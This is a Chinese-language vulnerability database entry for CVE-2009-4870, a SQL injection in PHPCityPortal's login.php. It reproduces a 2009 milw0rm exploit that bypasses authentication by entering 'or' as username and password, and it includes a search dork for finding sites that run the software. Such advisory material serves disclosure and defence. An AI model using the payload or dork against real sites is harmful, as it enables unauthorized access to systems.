PHPCityPortal 'login.php'多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118281 漏洞类型 SQL注入
发布时间 2009-08-07 更新时间 2009-08-07
CVE编号 CVE-2009-4870 CNNVD-ID CNNVD-201005-143
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9395
https://www.securityfocus.com/bid/42536
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201005-143
|漏洞详情
PHPCityPortal的login.php存在多个SQL注入漏洞,远程攻击者可以通过(1)req_username(即Username)参数,和(2)req_password(即Password)参数执行任意SQL命令。
|漏洞EXP
******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
 
Author:   CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Page:  http://phpcityportal.com/
 
DOrk:    intext:"Powered by PHPCityPortal.com"
 
******************************************************************************************
EXPLOIT
 
Username: 'or'
 
Password: 'or'
 
http://localhost/[path]/login.php
 
Demo: http://phpcityportal.com/demo/login.php
 
******************************************************************************************

# milw0rm.com [2009-08-07]
|受影响的产品
Php City Portal Php City Portal 0
|参考资料

来源:MILW0RM
名称:9395
链接:http://www.milw0rm.com/exploits/9395
来源:SECUNIA
名称:36210
链接:http://secunia.com/advisories/36210